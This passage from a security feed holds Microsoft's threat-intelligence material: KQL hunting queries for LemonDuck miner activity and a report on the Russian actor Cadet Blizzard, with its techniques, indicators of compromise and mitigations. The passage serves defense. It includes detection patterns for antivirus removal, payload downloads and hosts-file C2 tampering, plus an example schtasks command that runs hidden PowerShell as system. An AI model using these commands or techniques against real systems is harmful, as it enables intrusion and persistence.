center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEALWQzUrEQBCE6yz4DiEnF0SfwIP4A6IsguBVQja4wyaTMBN_FsRn97M2u6LeBBl6plPdVV2dczV6VlDNe6uk3lnmXIA3ihrJ97WnNxV60RIsEYWuqAWqQZXvqMcfCpegLfmcjs6cE71zl-h0nnkE-kqUf5xwRt5xKmoL3bjnk7kEyXrgbjkH6A_mLfQEd_w2p9QhEXceW1RWO7yeNAqY0foZ_gbbdByD9a6MVqw8IfjvlZr922ZRa292bWSwdrbz9eSswkNlv1_fw5Rn-mp2SvaxZTTGt_2n3inonkj05gmf4y1R6akXuvulNNMH1HgRaFYCAAA&runQuery=true&timeRangeId=week>)\n\n`DeviceProcessEvents \n| where InitiatingProcessFileName =~ \"wmic.exe\" \n| where InitiatingProcessCommandLine has_all(\"product where\",\"name like\",\"call uninstall\",\"/nointeractive\") \n| where InitiatingProcessCommandLine has_any(\"Kaspersky\",\"avast\",\"avp\",\"security\",\"eset\",\"AntiVirus\",\"Norton Security\")`\n\n**Known LemonDuck component script installations**\n\nLooks for instances of the callback actions which attempt to obfuscate detection while downloading supporting scripts such as those that enable the \u201cKiller\u201d and \u201cInfection\u201d functions for the malware as well as the mining components and potential secondary functions. Options for more specific instances included to account for environments with potential false positives. Most general versions are intended to account for minor script or component changes such as changing to utilize non .bin files, and non-common components. [Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAN2QzWrCUBCFz1roO1xctSC60p2rVlEQ8Q0kJrYJJlGS-Ac-vN8dA9rgwm3LMHcm58zPmXxprYMShcSFCm0tK7ER-Fq5KvI3tXSR01ExWIE7TeES2ESBvbl-GhPGoCn5nIrMenyV07va2lF3tFmlzUyxLvGEt9XBQ3qiB-zjqYpXdHySZ1gAF2lmNb43Bim15PXbvaoePQ4uhNuSVcw513oiU5xTvwdNNaxxr7LfqEmJAV-RaQpq9qZjR3_Fjoltj-0yB1Pw-gv__j2e62pluu7X_Z_bNsy83-eRRN8NJNPg1z-4At8RQUloAwAA&runQuery=true&timeRangeId=week>)\n\n`DeviceProcessEvents \n| where InitiatingProcessFileName in (\"powershell.exe\",\"cmd.exe\") \n| where InitiatingProcessCommandLine has_all(\"/c echo try\",\"down_url=\",\"md5\",\"downloaddata\",\"ComputeHash\") or \nInitiatingProcessCommandLine has_all(\"/c echo try\",\"down_url=\",\"md5\",\"downloaddata\",\"ComputeHash\",\".bin\") or \nInitiatingProcessCommandLine has_all(\"/c echo try\",\"down_url=\",\"md5\",\"downloaddata\",\"ComputeHash\",\"kr.bin\",\"if.bin\",\"m6.bin\")`\n\n**LemonDuck named scheduled creation**\n\nLooks for instances of the LemonDuck creates statically named scheduled tasks or a semi-unique pattern of task creation LemonDuck also utilizes launching hidden PowerShell processes in conjunction with randomly generated task names. An example of a randomly generated one is: "schtasks.exe" /create /ru system /sc MINUTE /mo 60 /tn fs5yDs9ArkV\\2IVLzNXfZV/F /tr "powershell -w hidden -c PS_CMD". [Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAKWS0WrCQBBF77PgPyx5UrD6BX3S-mRLwQ8o2ygoGpXdtGlB_PaenSQlFV-kLLO53Jmde3eyM631qa1yvq8KOhqKrCf4tQ4qwX31dJZTpQ1cIJzmnNqDXuRVGPOoC3tGfU5dCR-1I8Zkv4jsZp-_qlNwwfIor7RA42BVG-s2oMeE2nTSo5B6Dv_d9c3476Z7CXZ6526e8zuQB-_Jja7yH-bAX2WCTcybM4duYE8O73WUNG_dt9YKqNc44jxarvjNpj_Q4gKlrsMWzztsaPCJ2spmGG2WyYPTA1xytsXpyt5E4nKb8hKvUz1rZvf9AWK9PVhOAgAA&runQuery=true&timeRangeId=week>)\n\n`DeviceProcessEvents \n| where FileName =~ \"schtasks.exe\" \n| where ProcessCommandLine has(\"/create\") \n| where ProcessCommandLine has_any(\"/tn blackball\",\"/tn blutea\",\"/tn rtsa\") or \nProcessCommandLine has_all(\"/create\",\"/ru\",\"system\",\"/sc\",\"/mo\",\"/tn\",\"/F\",\"/tr\",\"powershell -w hidden -c PS_CMD\")`\n\n**Competition killer script scheduled task execution**\n\nLooks for instances of the LemonDuck component KR.Bin, which is intended to kill competition prior to making the installation and persistence of the malware concrete. The killer script used is based off historical versions from 2018 and earlier, which has grown over time to include scheduled task and service names of various botnets, malware, and other competing services. The version currently in use by LemonDuck has approximately 40-60 scheduled task names. The upper maximum in this query can be modified and adjusted to include time bounding. [Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAJWRT0_CQBDF35nE79D0BAkRDhw4oBeqCQbUxD_XBguxhlpMW8EaP7y_HQppiATMZmZnZt_MvLwNNNdKb4q475VpaVHOuaI-V6qC-EwN_cjTWjG1DPP20EPid86UjpnGTEwNFVPJFeITTlM-WUS1sPoCOwf3hflqYx0FxAlW1GqPut3F1_jWjlGuz2pvxs5v2-myBVHIq5vTPIlri84XlfigpskIxHaX41mYJrMKteX5zMTEmLj9F5jjk-FLWCTW8woyhsuGU3gip7-U_8-E-g-ksHE_MOHOyTeKPtDnuJZVfme8I2Pt6YZ4hXl60gdzp7V_WaKyf4DjYXUuTZ-euqbSMS0Hhu6D_gUG3Q8GqgIAAA&runQuery=true&timeRangeId=week>)\n\n`DeviceProcessEvents \n| where ProcessCommandLine has_all(\"schtasks.exe\",\"/Delete\",\"/TN\",\"/F\") \n| summarize make_set(ProcessCommandLine) by DeviceId \n| extend DeleteVolume = array_length(set_ProcessCommandLine) \n| where set_ProcessCommandLine has_any(\"Mysa\",\"Sorry\",\"Oracle Java Update\",\"ok\") where DeleteVolume >= 40 and DeleteVolume <= 80`\n\n**LemonDuck hosts file adjustment for dynamic C2 downloads**\n\nLooks for a PowerShell event wherein LemonDuck will attempt to simultaneously retrieve the IP address of a C2 and modify the hosts file with the retrieved address. The address is then attributed to a name that does not exist and is randomly generated. The script then instructs the machine to download data from the address. This query has a more general and more specific version, allowing the detection of this technique if other activity groups were to utilize it. [Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAMWQuwrCYAyFzyz4DqWTgvgGDmK9gYigu5S22IK20op18OH9Erro4OAiIZc_OTknbaRMdxVKyDvVqrxqsDn9TKVu1H319FSgVjm9Gg-0ZlYwLRR7LHX6YFjQPVNvQVx8Z4IFCnUF1TpT44xnbEx-4OGPajPqCxYzS7VxjG3mdBodiaYygH9J_6YV-IY8BZ26irFYDDXCDZN0dd5hbTaE0y6s2PnHXWv432cHNvZs1J3-9_vtHfn_L9Gt0E952_Wxf90Lt1_r6hICAAA&runQuery=true&timeRangeId=week>)\n\n`DeviceProcessEvents \n| where InitiatingProcessFileName == \"powershell.exe\" \n| where InitiatingProcessCommandLine has_all(\"GetHostAddresses\",\"etc\",\"hosts\") \nor InitiatingProcessCommandLine has_all(\"GetHostAddresses\",\"IPAddressToString\",\"etc\",\"hosts\",\"DownloadData\")`\n\n \n\n[Learn how your organization can stop attacks through automated, cross-domain security and built-in AI with Microsoft Defender 365](<https://www.microsoft.com/en-us/microsoft-365/security/microsoft-365-defender>).\n\n \n\nThe post [When coin miners evolve, Part 2: Hunting down LemonDuck and LemonCat attacks](<https://www.microsoft.com/security/blog/2021/07/29/when-coin-miners-evolve-part-2-hunting-down-lemonduck-and-lemoncat-attacks/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-07-29T19:00:59", "type": "mssecure", "title": "When coin miners evolve, Part 2: Hunting down LemonDuck and LemonCat attacks", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0144", "CVE-2017-8464", "CVE-2019-0708", "CVE-2020-0796", "CVE-2021-26855", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-07-29T19:00:59", "id": "MSSECURE:4A6B394DCAF12E05136AE087248E228C", "href": "https://www.microsoft.com/security/blog/2021/07/29/when-coin-miners-evolve-part-2-hunting-down-lemonduck-and-lemoncat-attacks/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-23T15:26:13", "description": "As Russia\u2019s invasion of Ukraine continues into its second year and Microsoft continues to collaborate with global partners in response, the exposure of destructive cyber capabilities and information operations provide greater clarity into the tools and techniques used by Russian state-sponsored threat actors. Throughout the conflict, Russian threat actors have deployed a variety of destructive capabilities with varying levels of sophistication and impact, which showcase how malicious actors rapidly implement novel techniques during a hybrid war, along with the practical limitations of executing destructive campaigns when significant operational errors are made and the security community rallies around defense. These insights help security researchers continuously refine detection and mitigation capabilities to defend against such attacks as they evolve in a wartime environment.\n\nToday, Microsoft Threat Intelligence is sharing updated details about techniques of a threat actor formerly tracked as [DEV-0586](<https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/>)\u2014a distinct Russian state-sponsored threat actor that has now been elevated to the name Cadet Blizzard. As a result of our investigation into their intrusion activity over the past year, we have gained high confidence in our analysis and knowledge of the actor\u2019s tooling, victimology, and motivation, meeting the criteria to convert this group to a [named threat actor](<https://www.microsoft.com/security/blog/2023/04/18/microsoft-shifts-to-a-new-threat-actor-naming-taxonomy/>). \n\nMicrosoft assesses that Cadet Blizzard operations are [associated with the Russian General Staff Main Intelligence Directorate (GRU)](<https://blogs.microsoft.com/on-the-issues/2023/06/14/russian-cyberattacks-ukraine-cadet-blizzard/>) but are separate from other known and more established GRU-affiliated groups such as Forest Blizzard (STRONTIUM) and Seashell Blizzard (IRIDIUM). While Microsoft constantly tracks a number of activity groups with varying degrees of Russian government affiliation, the emergence of a novel GRU affiliated actor, particularly one which has conducted destructive cyber operations likely supporting broader military objectives in Ukraine, is a notable development in the Russian cyber threat landscape. A month before Russia invaded Ukraine, Cadet Blizzard foreshadowed future destructive activity when it created and deployed [WhisperGate](<https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/>), a destructive capability that wipes Master Boot Records (MBRs), against Ukrainian government organizations. Cadet Blizzard is also linked [to the defacements](<https://www.npr.org/2022/01/14/1073001754/ukraine-cyber-attack-government-websites-russia>) of several Ukrainian organization websites, as well as multiple operations, including the hack-and-leak forum known as \u201cFree Civilian\u201d.\n\nMicrosoft has tracked Cadet Blizzard since the deployment of WhisperGate in January 2022. We assess that they have been operational in some capacity since at least 2020 and continue to perform network operations through the present. Operationally consistent with the remit and assessed objectives of GRU-led operations throughout Russia\u2019s invasion of Ukraine, Cadet Blizzard has engaged in focused destructive attacks, espionage, and information operations in regionally significant areas. Cadet Blizzard\u2019s operations, though comparatively less prolific in both scale and scope to more established threat actors such as Seashell Blizzard, are structured to deliver impact and frequently run the risk of hampering continuity of network operations and exposing sensitive information through targeted hack-and-leak operations. Primary targeted sectors include government organizations and information technology providers in Ukraine, although organizations in Europe and Latin America have also been targeted.\n\nMicrosoft has been [working with CERT-UA](<https://blogs.microsoft.com/on-the-issues/2022/11/03/our-tech-support-ukraine/#:~:text=Since%20the%20war%20began%20in%20February%2C%20Microsoft%20and,critical%20Ukrainian%20services%20through%20data%20centers%20across%20Europe.>) closely since the beginning of Russia\u2019s war in Ukraine and continues to support the country and neighboring states in protecting against cyberattacks, such as the ones carried out by Cadet Blizzard. As with any observed nation-state actor activity, Microsoft directly and proactively notifies customers that have been targeted or compromised, providing them with the information they need to guide their investigations. Microsoft is also actively working with members of the global security community and other strategic partners to share information that can address this evolving threat through multiple channels. Having elevated this activity to a distinct threat actor name, we\u2019re sharing this information with the larger security community to provide insights to protect and mitigate Cadet Blizzard as a threat. Organizations should actively take steps to protect environments against Cadet Blizzard, and this blog further aims to discuss how to detect and prevent disruption.\n\n## Who is Cadet Blizzard?\n\nCadet Blizzard is a Russian GRU-sponsored threat group that Microsoft began tracking following disruptive and destructive events occurring at multiple government agencies in Ukraine in mid-January 2022. During this time, Russian troops backed with tanks and artillery were surrounding the Ukrainian border as the military prepped for an offensive attack. The [defacements](<https://www.npr.org/2022/01/14/1073001754/ukraine-cyber-attack-government-websites-russia>) of key Ukrainian institutions\u2019 websites, coupled with the WhisperGate malware, prefaced [multiple waves of attacks](<https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE4Vwwd>) by Seashell Blizzard that followed when the Russian military began their ground offensive a month later.\n\nCadet Blizzard compromises and maintains a foothold on affected networks for months, often exfiltrating data prior to disruptive actions. Microsoft observed Cadet Blizzard\u2019s activity peak between January and June 2022, followed by an extended period of reduced activity. The group re-emerged in January 2023 with increased operations against multiple entities in Ukraine and in Europe, including another round of website defacements and a new \u201cFree Civilian\u201d Telegram channel affiliated with the hack-and-leak front under the same name that first emerged in January 2022, around the same time as the initial defacements. Cadet Blizzard actors are active seven days of the week and have conducted their operations during their primary European targets\u2019 off-business hours. Microsoft assesses that NATO member states involved in providing military aid to Ukraine are at greater risk.\n\n![Cadet Blizzard heatmap displaying their operational cadence by the day of the week and active times \$UTC\$. ](https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2023/06/Figure-1.-A-heatmap-of-the-operational-cadence-of-Cadet-Blizzard.webp)Figure 1. A heatmap of the operational cadence of Cadet Blizzard\n\nCadet Blizzard seeks to conduct disruption, destruction, and information collection, using whatever means are available and sometimes acting in a haphazard fashion. While the group carries high risk due to their destructive activity, they appear to operate with a lower degree of operational security than that of longstanding and advanced Russian groups such as Seashell Blizzard and Forest Blizzard. Additionally, as is the case with other Russian state-sponsored threat groups, Microsoft assesses that at least one Russian private sector organization has materially supported Cadet Blizzard by providing operational support including during the WhisperGate destructive attack.\n\n### Targets\n\nCadet Blizzard\u2019s operations are global in scope but consistently affect regional hotspots in Ukraine, Europe, Central Asia, and, periodically, Latin America. Cadet Blizzard likely prioritizes target networks based on requirements consistent with Russian military or intelligence objectives such as geolocation or perceived impact. Cadet Blizzard, consistent with a Russian military-associated threat actor, continues to mainly target Ukraine, although the relative scope of impact of Cadet Blizzard\u2019s destructive activity is minimal compared to the multiple waves of destructive attacks that we attribute to Seashell Blizzard. In January 2022, Cadet Blizzard launched destructive attacks in Ukraine in the following industry verticals:\n\n * Government services\n * Law enforcement\n * Non-profit/non-governmental organization\n * IT service providers/consulting\n * Emergency services\n\nCadet Blizzard has repeatedly targeted information technology providers and software developers that provide services to government organizations using a supply chain \u201ccompromise one, compromise many\u201d technique. The group\u2019s January 2022 compromise of government entities in Ukraine probably were at least in part due to access and information gained during a breach of an information technology provider that often worked with these organizations.\n\nPrior to the war in Ukraine, Cadet Blizzard performed historical compromises of several Eastern European entities as well, primarily affecting the government and technology sectors as early as April 2021. As the war continues, Cadet Blizzard activity poses an increasing risk to the broader European community, specifically any successful attacks against governments and IT service providers, which may give the actor both tactical and strategic-level insight into Western operations and policy surrounding the conflict. Gaining heightened levels of access into these targeted sectors may also enable Cadet Blizzard to carry out retaliatory demonstrations in opposition to the West\u2019s support for Ukraine.\n\n### Tools, tactics, and procedures\n\nCadet Blizzard is a conventional network operator and commonly utilizes living-off-the-land techniques after gaining initial access to move laterally through the network, collect credentials and other information, and deploy defense evasion techniques and persistence mechanisms. Unlike other Russian-affiliated groups that historically prefer to remain undetected to perform espionage, the result of at least some notable Cadet Blizzard operations are extremely disruptive and are almost certainly intended to be public signals to their targets to achieve the larger objective of destruction, disruption, and possibly, intimidation.\n\n![Cadet Blizzard's operational lifecycle includes exploiting servers, deploying web shells, pushing tunneling tools, and pivoting to internal networks for initial access. Lateral movement follows, which includes credential access via process dumping, interactive reverse shell via netcat/GOST, command execution via Impacket, disabling antivirus services, and wiping logs. Cadet Blizzard's action on objectives then include exfiltrating data, deploying destructive payloads, and leaking data or targeted information operations.](https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2023/06/Figure-3.-Cadet-Blizzards-normal-operational-lifecycle-1-1024x347.webp)Figure 2. Cadet Blizzard's normal operational lifecycle\n\n**Initial access**\n\nCadet Blizzard predominantly achieves initial access through exploitation of web servers commonly found on network perimeters and DMZs. Cadet Blizzard is also known for exploiting Confluence servers through the CVE-2021-26084 vulnerability, Exchange servers through multiple vulnerabilities including CVE-2022-41040 and ProxyShell, and likely commodity vulnerabilities in various open-source platforms such as content management systems.\n\n**Persistence**\n\nCadet Blizzard frequently persists on target networks through the deployment of commodity web shells used either for commanding or tunneling. Commonly utilized web shells include [P0wnyshell](<https://github.com/flozz/p0wny-shell>), [reGeorg](<https://github.com/sensepost/reGeorg>), PAS, and even custom variants included in publicly available exploit kits.\n\nIn February 2023, [CERT-UA reported](<https://cert.gov.ua/article/3947787>) an attempted attack against a Ukrainian state information system that involved a variant of the PAS web shell, which Microsoft assesses to be unique to Cadet Blizzard operations at the time of the intrusion.\n\n**Privilege escalation and credential harvesting** \nCadet Blizzard has leveraged a variety of living-off-the-land techniques to conduct privilege escalation and harvesting of credentials.\n\n * Dumping LSASS \u2013 Cadet Blizzard uses Sysinternals tools such as _procdump_ to dump LSASS in suspected offline credential harvesting efforts. Cadet Blizzard frequently renames _procdump64_ to alternative names, such as _dump64.exe_.\n * Dumping registry hives \u2013 Cadet Blizzard extracts registry hives using native means via _reg save_.\n\n**Lateral movement** \nCadet Blizzard conducts lateral movement with valid network credentials obtained from credential harvesting. To conduct lateral movement more efficiently, Cadet Blizzard typically uses modules from the publicly available [Impacket framework](<https://github.com/fortra/impacket>). While this framework is generically utilized by multiple actors, preferential execution of patterns of commands may allow for more precision profiling of Cadet Blizzard operations:\n\n * PowerShell _get-volume_ to enumerate the volume of a device\n![Code displaying the PowerShell get-volume command.](https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2023/06/Figure-3.-PowerShell-get-volume-command-1024x40.webp)Figure 3. PowerShell _get-volume_ command\n\n * Copying critical registry hives that contain password hashes and computer information\n![Code displaying copying of critical registry hives](https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2023/06/Figure-4.-Copying-critical-registry-hives-1024x70.webp)Figure 4. Copying critical registry hives\n\n * Downloading files directly from actor-owned infrastructure via the PowerShell _DownloadFile_ commandlet\n![Code displaying PowerShell DownloadFile commandlet](https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2023/06/Figure-5.-PowerShell-DownloadFile-commandlet-1024x97.webp)Figure 5. PowerShell _DownloadFile_ commandlet\n\n**Command execution and C2**\n\nCadet Blizzard periodically uses generic socket-based tunneling utilities to facilitate command and control (C2) to actor-controlled infrastructure. Payloads such as NetCat and Go Simple Tunnel (GOST) are commonly renamed to blend into the operating system but are used to shovel interactive command prompts over established sockets. Frequently, remote command execution may be facilitated through remotely scheduled tasks. The group has also sparingly utilized Meterpreter.\n\n![Code displaying a scheduled task creating a reverse shell](https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2023/06/Figure-6.-Scheduled-task-creating-a-reverse-shell-1024x104.webp)Figure 6. Scheduled task creating a reverse shell\n\n**Operational security**\n\nCadet Blizzard utilizes anonymization services IVPN, SurfShark, and Tor as their anonymization layer during select operations.\n\n**Anti-forensics** \nCadet Blizzard has been observed leveraging the _Win32_NTEventlogFile_ commandlet in PowerShell to extract both system and security event logs to an operational directory. The activities are anticipated to be consistent with anti-forensics activities.\n\n * Common file targets during extraction are:\n * _sec.evtx_\n * _sys.evtx_\n * Cadet Blizzard commonly deletes files used during operational phases seen in lateral movement.\n * Cadet Blizzard malware implants are known to disable Microsoft Defender Antivirus through a variety of means:\n * _NirSoft AdvancedRun_ utility, which is used to disable Microsoft Defender Antivirus by stopping the _WinDefend_ service.\n * _Disable Windows Defender.bat,_ which presumably disables Microsoft Defender Antivirus via the registry.\n![Code displaying the addition of registry keys to disable Windows Defender](https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2023/06/Figure-7.-Addition-of-registry-key-to-disable-Windows-Defender-1024x66.webp)Figure 7. Addition of registry key to disable Microsoft Defender Antivirus\n\n**Impact assessment**\n\nCadet Blizzard typically collects information en-masse from targeted servers. If mail servers are affected, Cadet Blizzard typically attempts to collect mail, placing incident response communications at risk. Credential material (such as SSH keys) are also a common target to provide methods for re-entry if a full remediation does not occur. As was the case with the WhisperGate operation in January 2022, Cadet Blizzard is known to deploy destructive malware to select target environments to delete data and render systems inoperable.\n\nAlso in January of 2022, Microsoft identified that data exfiltrated by Cadet Blizzard in compromises of various Ukrainian organizations was leaked on a Tor .onion site under the name \u201cFree Civilian.\u201d The organizations from which data was leaked strongly correlated to multiple Cadet Blizzard compromises earlier in 2022, leading Microsoft to assess that this forum is almost certainly linked to Cadet Blizzard. In February 2023, a new Telegram channel was established under the same \u201cFree Civilian\u201d moniker, suggesting that Cadet Blizzard intends to continue conducting information operations in the second year of the war. However, the public channel only has 1.3K followers with posts getting at most a dozen reactions as of the time of publication, signifying low user interaction. A private channel assumed to be operated by the same group appears to have shared data with 748 of those subscribers.\n\n![Screenshot of the Free Civilian hack-and-leak front, including links to \"stay in touch\".](https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2023/06/Figure-8.-Free-Civilian-hack-and-leak-front.webp)Figure 8. Free Civilian hack-and-leak front\n\n### Related ecosystems\n\nCadet Blizzard operations do not occur in a silo; there have been substantial technical indicators of intersection with other malicious cyber activity that may have a broader scope or a nexus outside of Russia. They have at times utilized services associated with these ecosystems such as Storm-0587, discussed below, as well as having support from at least one private sector enabler organization within Russia. Though there have been various forms of intersections in threat activity, when these groups have been observed operating independently, the tactics, techniques, procedures (TTPs) and capabilities have often been distinct\u2014therefore making it operationally valuable to distinguish these activity groups.\n\n**Storm-0587**\n\nStorm-0587 is a cluster of activity beginning as early as April 2021 involving a series of weaponized documents predominantly delivered in phishing operations usually to distribute a series of downloaders and [document stealers](<https://intezer.com/blog/malware-analysis/targeted-phishing-attack-against-ukrainian-government-expands-to-georgia/>). One of Storm-0587's trademark tools is [SaintBot](<https://www.malwarebytes.com/blog/threat-intelligence/2021/04/a-deep-dive-into-saint-bot-downloader>), an uncommon downloader that often appears in spear-phishing emails. This downloader can be customized to deploy almost anything as the payload, but in Ukraine, the malware often deploys a version of an [AutoIT information stealer](<https://gist.github.com/malwarezone/119bed274bc77b52122fa118f0a72618#file-stealer-au3-L2880>) that collects documents on the machine that threat actors deem of interest. This specific version of the malware has been named [OUTSTEEL by CERT UA](<https://cert.gov.ua/article/18419>) and has been observed in several attacks, such as a fake version of the Office of the President of Ukraine\u2019s website created in July 2021 that hid weaponized documents, including OUTSTEEL, that would download onto victim\u2019s machines when the documents are clicked.\n\n## Mitigation and protection guidance\n\n### Defending against Cadet Blizzard\n\nActivities linked to Cadet Blizzard indicate that they are comprehensive in their approach and have demonstrated an ability to hold networks at risk of continued compromise for an extended period of time. A comprehensive approach to incident response may be required in order to fully remediate from Cadet Blizzard operations. Organizations can bolster security of information assets and expedite incident response by focusing on areas of risk based on actor tradecraft enumerated within this report. Use the included indicators of compromise to investigate environments and assess for potential intrusion.\n\n * Review all authentication activity for remote access infrastructure, with a particular focus on accounts configured with single factor authentication, to confirm authenticity and investigate any anomalous activity.\n * Enable multifactor authentication (MFA) to mitigate potentially compromised credentials and ensure that MFA is enforced for all remote connectivity. _NOTE:_ Microsoft strongly encourages all customers download and use password-less solutions like [Microsoft Authenticator](<https://www.microsoft.com/account/authenticator/>) to secure accounts.\n * Enable [controlled folder access (CFA)](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/controlled-folders>) to prevent MBR/VBR modification.\n * [Block process creations originating from PSExec and WMI commands](<https://learn.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction-rules-reference#block-process-creations-originating-from-psexec-and-wmi-commands>) to stop lateral movement utilizing the WMIexec component of Impacket.\n * Turn on [cloud-delivered protection](<https://learn.microsoft.com/microsoft-365/security/defender-endpoint/configure-block-at-first-sight-microsoft-defender-antivirus>) in Microsoft Defender Antivirus, turned on by default in Windows, or the equivalent for your chosen antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a huge majority of new and unknown variants.\n\n### Hunting for Cadet Blizzard hands-on-keyboard activity\n\nTo uncover malicious hands-on-keyboard activities in environments, identify any unusual or unexpected commands or tools launched on systems as well as the presence of any unusual directories or files that could be used for staging or storing malicious tools. Use the common commands, tools, staging directories, and indicators of compromise listed below to help identify Cadet Blizzard intrusion and hands-on-keyboard activity in environments.\n\n**Common commands**\n\n * _systeminfo_ to fingerprint a device after lateral movement\n * _get-volume_ to fingerprint a device after lateral movement\n * _nslookup_ to research specific devices (IP) and FQDNs internally\n * _Get-DnsServerResourceRecord_ to conduct reconnaissance of an internal DNS namespace\n * _query session_ to profile RDP connections\n * _route print_ to enumerate routes available on the devices\n * _DownloadFile_ via PowerShell to download payloads from external servers\n\n**Common tool staging directories**\n\n * _C:\\ProgramData_\n * _C:\\PerfLogs_\n * _C:\\Temp_\n * _C:\\_\n * Subdirectories of legitimate (or fake) user accounts within _%APPDATA%\\Temp_\n * Subdirectories with the name _USOPublic _in the path\n\n**Common tools**\n\n * Tor\n * Python\n * SurfShark\n * Teamviewer\n * Meterpreter named as _dbus-rpc.exe_ in known instances\n * IVPN\n * NGROK\n * _GOST.exe_ frequently masked as _USORead.exe_****\n * regeorg web shell\n\n**Indicators of compromise (IOCs)**\n\nIOC| Type| Description \n---|---|--- \njusticeua[.]org| Domain| Sender for non-weaponized emails containing only antagonistic messaging: _volodimir_azov@justiceua[.]org_ \n179.43.187[.]33| IP address| Hosted the JusticeUA operation between March and April 2022 \n3a2a2de20daa74d8f6921230416ed4e6| PE Import Hash| PE Import Hash matching WhisperGate malware \n3e4bb8089657fef9b8e84d9e17fd0d7740853c4c0487081dacc4f22359bade5c| SHA-256| Web shell - p0wnyshell (not unique to Cadet Blizzard) \n20215acd064c02e5aa6ae3996b53f5313c3f13625a63da1d3795c992ea730191| SHA-256| Web shell - p0wnyshell (not unique to Cadet Blizzard) \n3fe9214b33ead5c7d1f80af469593638b9e1e5f5730a7d3ba2f96b6b555514d4| SHA-256| Web shell - WSO Shell (not unique to Cadet Blizzard) \n23d6611a730bed886cc3b4ce6780a7b5439b01ddf6706ba120ed3ebeb3b1c478| SHA-256| Web shell \u2013 reGeorg (not unique to Cadet Blizzard) \n7fedaf0dec060e40cbdf4ec6d0fbfc427593ad5503ad0abaf6b943405863c897| SHA-256| Web shell \u2013 PAS (may not be unique to Cadet Blizzard) \n \n### Microsoft 365 Defender detections\n\n**Microsoft Defender Antivirus**\n\nMicrosoft Defender Antivirus detects behavioral components of techniques this threat actor uses as the following:\n\n * Behavior:Win32/WmiprvseRemoteProc\n\nMicrosoft Defender Antivirus detects the WhisperGate malware attributed to this threat actor with the following family:\n\n * WhisperGate\n\n**Microsoft Defender for Endpoint**\n\nThe following Microsoft Defender for Endpoint alerts can indicate associated threat activity:\n\n * Cadet Blizzard activity detected\n * Possible Storm-0587 activity detected\n\nThe following alerts might also indicate threat activity related to this threat. Note, however, that these alerts can be also triggered by unrelated threat activity.\n\n * Ongoing hands-on-keyboard attack via Impacket toolkit\n * Suspicious PowerShell command line\n * Suspicious WMI process creation\n\n**Microsoft Defender Vulnerability Management**\n\nMicrosoft Defender Vulnerability Management surfaces devices that may be affected by the following vulnerabilities used in this threat:\n\n * CVE-2021-26084\n * CVE-2020-1472\n * CVE-2021-4034\n\n### Hunting queries\n\n**Microsoft 365 Defender**\n\nMicrosoft 365 Defender customers can run the following query to find related activity in their networks:\n\nCheck for WMIExec Impacket activity with common Cadet Blizzard commands\n \n \n DeviceProcessEvents\n | where InitiatingProcessFileName =~ \"WmiPrvSE.exe\" and FileName =~ \"cmd.exe\"\n | where ProcessCommandLine matches regex \"2>&1\"\n | where ProcessCommandLine has_any (\"get-volume\",\"systeminfo\",\"reg.exe\",\"downloadfile\",\"nslookup\",\"query session\",\"route print\")\n \n\nFind PowerShell file downloads\n \n \n DeviceProcessEvents\n | where FileName == \"powershell.exe\" and ProcessCommandLine has \"DownloadFile\"\n \n\nScheduled task creation, command execution and C2 communication\n \n \n DeviceProcessEvents \n | where Timestamp > ago(14d) \n | where FileName =~ \"schtasks.exe\" \n | where (ProcessCommandLine contains \"splservice\" or ProcessCommandLine contains \"spl32\") and \n (ProcessCommandLine contains \"127.0.0.1\" or ProcessCommandLine contains \"2>&1\")\n \n\n### Microsoft Sentinel\n\nMicrosoft Sentinel customers can use the TI Mapping analytics (a series of analytics all prefixed with \u201cTI map\u201d) to automatically match indicators associated with Cadet Blizzard in Microsoft Defender Threat Intelligence (MDTI) with data in their workspace. If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the Microsoft Sentinel Content Hub to have the MDTI connector and analytics rule deployed in their Sentinel workspace. More details on the Content Hub can be found here: <https://learn.microsoft.com/azure/sentinel/sentinel-solutions-deploy>.\n\nMicrosoft Sentinel also has a range of detection and threat hunting content that customers can use to detect the post exploitation activity detailed in this blog in addition to Microsoft 365 Defender detections list 